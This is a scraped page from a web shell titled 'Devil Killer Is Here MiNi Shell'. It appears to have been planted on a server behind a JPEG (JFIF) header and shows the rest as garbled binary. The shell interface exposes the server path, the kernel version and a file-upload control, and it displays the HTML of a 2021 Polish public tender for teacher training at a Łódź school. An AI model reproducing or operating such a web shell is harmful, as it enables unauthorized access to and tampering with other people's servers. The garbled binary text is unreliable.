JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210930/0019742401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi szkoleniowe dla nauczycieli Zespołu Szkół i Placówek Oświatowych Nowoczesnych Technologii Województwa Łódzkiego w Łodzi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Łódzkie-Zespół Szkół i Placówek Oświatowych Nowoczesnych Technologii Województwa Łódzkiego w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 380827452</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Narutowicza 122</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-145</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42 631 98 48</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">42 631 98 48</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@nowoczesnaszkola.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.nowoczesnaszkola.edu.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi szkoleniowe dla nauczycieli Zespołu Szkół i Placówek Oświatowych Nowoczesnych Technologii Województwa Łódzkiego w Łodzi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5f8d230d-21a8-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00197424</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00067726/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługi szkoleniowe dla nauczycieli i słuchaczy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Akademia Programowania i Multimediów </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.nowoczesnaszkola.edu.pl/ ; https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniPortal<br/>https://miniPortal.uzp.gov.pl,<br/>ePUAP (Elektroniczna Skrzynka Podawcza –nazwa – ZESPÓŁ SZKÓŁ I<br/>PLACÓWEK OŚWIATOWYCH NOWOCZESNYCH TECHNOLOGII WOJEWÓDZTWA ŁÓDZKIEGO)<br/>https://epuap.gov.pl/wps/portal oraz<br/>poczty elektronicznej e-mail:<br/>sekretariat@nowoczesnaszkola.edu.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z Rozporządzeniem Prezesa<br/>Rady Ministrów z dnia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz.U. poz. 2452) oraz Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020 r w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń jakich może żądać zamawiający od wykonawcy (Dz. U. poz. 2415).<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi<br/>posiadać konto na ePUAP i dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz<br/>do formularza do komunikacji.. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu zostały opisane w Instrukcji użytkowania systemu miniPortal oraz<br/>Regulaminie ePUAP. Maksymalny rozmiar plików przesyłanych za pośrednictwem formularzy -do 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP. Identyfikator postępowania stanowi Załącznik nr 8 do SWZ.<br/>Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub<br/>wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty<br/>Wykonawca zobowiązany jest podać adres<br/>skrzynki ePUAP, Ofertę należy sporządzić w języku<br/>polskim. Sposób złożenia oferty w tym zaszyfrowania oferty opisany został w Instrukcji użytkownika<br/>systemu miniPortal-ePUAP. Wykonawca, aby wziąć́ udział w postepowaniu o udzielenie<br/>zamówienia publicznego i złożyć ofertę do postępowania musi założyć konto na Platformie ePUAP.<br/>Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej w<br/>szczególności w formacie danych .doc, .docx, .pdf i podpisana kwalifikowanym podpisem<br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym. Sposób złożenia oferty w tym<br/>zaszyfrowania oferty opisany został w Instrukcji użytkowania systemu miniPortal. Oferta może być<br/>składana tylko do upływu terminu składania ofert. Wykonawca może przed upływem terminu do<br/>składania ofert zmienić lub wycofać ofertę za pośrednictwem Formularza do złożenia, zmiany,<br/>wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionych również na miniPortalu. W<br/>postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami w<br/>szczególności składanie oświadczeń, wniosków (innych niż wskazanych w pkt. 2.), zawiadomień oraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem formularza dostępnego na<br/>ePUAP (Elektroniczna Skrzynka Podawcza – nazwa – ZESPÓŁ SZKÓŁ I PLACÓWEK<br/>OŚWIATOWYCH NOWOCZESNYCH TECHNOLOGII WOJEWÓDZTWA ŁÓDZKIEGO) oraz<br/>udostępnionego przez miniPortal (Formularz do komunikacji).<br/>podając numer ogłoszenia (BZP lub numer postępowania – numer referencyjny ID) lub za pomocą<br/>poczty elektronicznej, e-mail: sekretariat@nowoczesnaszkola.edu.pl.<br/>.Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz<br/>informacje przy użyciu środków komunikacji elektronicznej, każda ze stron na żądanie drugiej strony<br/>niezwłocznie potwierdza fakt ich otrzymania.<br/>Pozostałe informacje znajdują się w rozdziale 16 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia o<br/>ochronie danych osobowych z dnia 27 kwietnia 2016 r. (rozporządzenie Parlamentu Europejskiego i<br/>Rady UE 2016/679 w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE)<br/>uprzejmie informujemy, że:<br/>1.1 Administratorem danych osobowych jest Dyrektor Zespołu Szkół i Placówek Oświatowych<br/>Nowoczesnych Technologii Województwa Łódzkiego w Łodzi, ul. Gabriela Narutowicza 122, 90-145<br/>Łódź, tel./faks: 426319848, 784207390<br/>1.2 Administrator wyznaczył inspektora oraz zastępcę inspektora ochrony danych osobowych, z którymi<br/>może się Pani/Pan skontaktować poprzez e-mail sekretariat@nowoczesnaszkola.edu.pl. 1.3 Podanie<br/>danych osobowych jest warunkiem koniecznym do realizacji sprawy w Zespole Szkół i Placówek<br/>Oświatowych Nowoczesnych Technologii Województwa Łódzkiego w Łodzi.1.4 Dane osobowe mogą<br/>być udostępniane innym podmiotom, uprawnionym do ich otrzymania na<br/>podstawie obowiązujących przepisów prawa, tj. na podstawie art. 18 i art. 74 Prawa zamówień<br/>publicznych a ponadto odbiorcom danych w rozumieniu przepisów o ochronie danych osobowych, tj.<br/>podmiotom świadczącym usługi pocztowe, kurierskie, usługi informatyczne, bankowe,<br/>ubezpieczeniowe, osobom i podmiotom zainteresowanym prowadzonym postępowaniem o udzieleniezamówienia publicznego, a także podmiotom korzystającym z Biuletynu Informacji Publicznej,<br/>Biuletynu Zamówień Publicznych, Bazy konkurencyjności oraz internetowej platformy zakupowej –<br/>eKatalogi, będącej w gestii Urzędu Zamówień Publicznych. Dane osobowe nie będą przekazywane do<br/>państw trzecich, na podstawie szczególnych regulacji prawnych, w tym umów międzynarodowych.<br/>1.5Dane osobowe będą przetwarzane, w tym przechowywane przez okres 4 lat, licząc od pierwszego<br/>stycznia roku następującego po roku, w którym sprawa została zakończona, a następnie, zgodnie z<br/>przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach, przez okres<br/>5 lat, zgodnie kategorią B5, w przypadku dokumentacji postępowania oraz 10 lat w związku z zawartą<br/>umową, zgodnie z kategorią archiwalną B10, a w przypadku zmiany kategorii archiwalnej dokumentacji<br/>przez okres zgodny ze zmienioną kategorią archiwalną dokumentacji. W przypadku zamówień<br/>finansowanych ze środków funduszy europejskich lub innych środków niż pochodzące z budżetu Unii<br/>Europejskiej na podstawie odrębnych przepisów tym zakresie do 25 lat.1.6 W związku z<br/>przetwarzaniem danych osobowych, na podstawie przepisów prawa, posiada Pani/Pan prawo do: a)<br/>dostępu do treści swoich danych, na podstawie art. 15 ogólnego rozporządzenia;<br/>b) sprostowania danych, na podstawie art. 16 ogólnego rozporządzenia;<br/>c) ograniczenia przetwarzania, na podstawie art. 18 ogólnego rozporządzenia.<br/>1.7 Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, iż przetwarzanie danych osobowych narusza przepisy o ochronie<br/>danych osobowych.<br/>1.8 Gdy podanie danych osobowych wynika z przepisów prawa, jest Pani/Pan zobowiązana(y) do ich<br/>podania. Konsekwencją niepodania danych osobowych będzie brak możliwości zawarcia umowy o<br/>udzielenie zamówienia publicznego.<br/>1.9 Dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.<br/>2 Wykonawca, wypełniając obowiązki informacyjne wynikający z art. 13 lub art. 14 RODO względem<br/>osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o<br/>udzielenie zamówienia publicznego w tym postępowaniu składa stosowne oświadczenie zawarte w<br/>Formularzu ofertowym (Załącznik nr 2 do SWZ).<br/>Pozostałe informacje znajdują się w rozdziale 29 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IP/XI.3.1/02/3</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 437317,00 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 16433,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa zorganizowania i przeprowadzenia szkoleń w ramach<br/>projektu: „Akademia Programowania i Multimediów” współfinansowanego ze środków<br/>Europejskiego Funduszu Społecznego w ramach Regionalnego Programu OperacyjnegoWojewództwa Łódzkiego na lata 2014-2020.<br/>Przedmiotem zamówienia jest przeprowadzenie cyklu szkoleń dla nauczycieli w ramach<br/>realizacji projektu „Akademia Programowania i Multimediów” współfinansowanego ze środków<br/>Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego<br/>Województwa Łódzkiego na lata 2014-2020 - zgodnie z pkt I OPZ ( Załącznik nr 1 do SWZ)<br/>Szkolenia odbywać się będą w miejscu wskazanym przez Wykonawcę na terenie miasta Łodzi<br/>stacjonarnie lub w siedzibie Zamawiającego, z zastrzeżeniem, że na żądanie Zamawiającego (w<br/>pełni w gestii Zamawiającego) odbywać się będą zdalnie na bezpłatnej platformie szkoleniowej,<br/>zabezpieczonej przez Wykonawcę.<br/>Szkolenia odbywać się będą w dniach tygodnia wskazanych w OPZ ( Załącznik nr 1 do SWZ)<br/>Z odbytych szkoleń słuchacze otrzymują certyfikaty wystawiane przez Wykonawcę- zgodnie z<br/>danymi zawartymi w Załączniku nr 1 do SWZ dla poszczególnych szkoleń.<br/>Przez 1 godzinę szkoleniową (1 h) rozumie się 60 min.<br/>Na podstawie art. 95 ust. 1 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę<br/>lub Podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez<br/>Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności<br/>polega na wykonywaniu pracy w sposób określony w art. 22 §1 ustawy z dnia 26 czerwca 1974<br/>r. – Kodeks pracy (Dz. U z 2020 r., poz. 1320), tj. osób wykonujących w trakcie realizacji<br/>zamówienia czynności: Zamawiający nie stawia w tym zakresie żadnych wymogów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <p class="mb-0">80521000-2 - Usługi opracowywania programów szkoleniowych</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <p class="mb-0">80533100-0 - Usługi szkolenia komputerowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kadry</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba godzin przeprowadzonych szkoleń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy,<br/>którzy spełniają następujące warunki udziału w postępowaniu dotyczące: zdolności technicznej<br/>lub zawodowej:<br/>dysponuje co najmniej jedną osobą do prowadzenia szkoleń z nagrywania/obróbki dźwięku,<br/>która spełnia poniższe warunki:<br/>posiada doświadczenie w zakresie przeprowadzenia szkoleń//kursów z nagrywania/obróbki<br/>dźwięku w okresie ostatnich 3 lat przed terminem składania ofert z łączną liczbą godzin<br/>szkoleniowych wynoszącą co najmniej 150 (60 min. każda godzina).<br/>Uwaga!<br/>1. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia lub polegania<br/>na zdolnościach podmiotów udostępniających zasoby ww. warunek oceniany będzie łącznie.<br/>2. Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania prac przez osoby<br/>wskazane w wykazie bezpośrednio u podmiotu, na rzecz którego były wykonane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest dołączyć ww. oświadczenie o braku podstaw<br/>do wykluczenia z<br/>postępowania – zgodnie z Załącznikiem nr 4a do SWZ. Wykonawca, który polega na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania stanowi<br/>Załącznik nr 9 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 11.2 SWZ, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik 4b do<br/>SWZ).Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.<br/>Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują: Oświadczenie Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art.125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przezZamawiającego, o których mowa<br/>w:Wykonawca zobowiązany jest dołączyć ww. oświadczenie o braku podstaw do wykluczenia zpostępowania – zgodnie z Załącznikiem nr 4a do SWZ. Wykonawca, który polega na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.Wzór zobowiązania stanowi<br/>Załącznik nr 9 do SWZ. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt. 11.2 SWZ, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu w zakresie, w jakim Wykonawca powołuje się na jego zasoby (Załącznik 4b do SWZ).<br/>Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.<br/>Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w<br/>art.125 ust. 1 ustawy Pzp, w zakresie podstaw 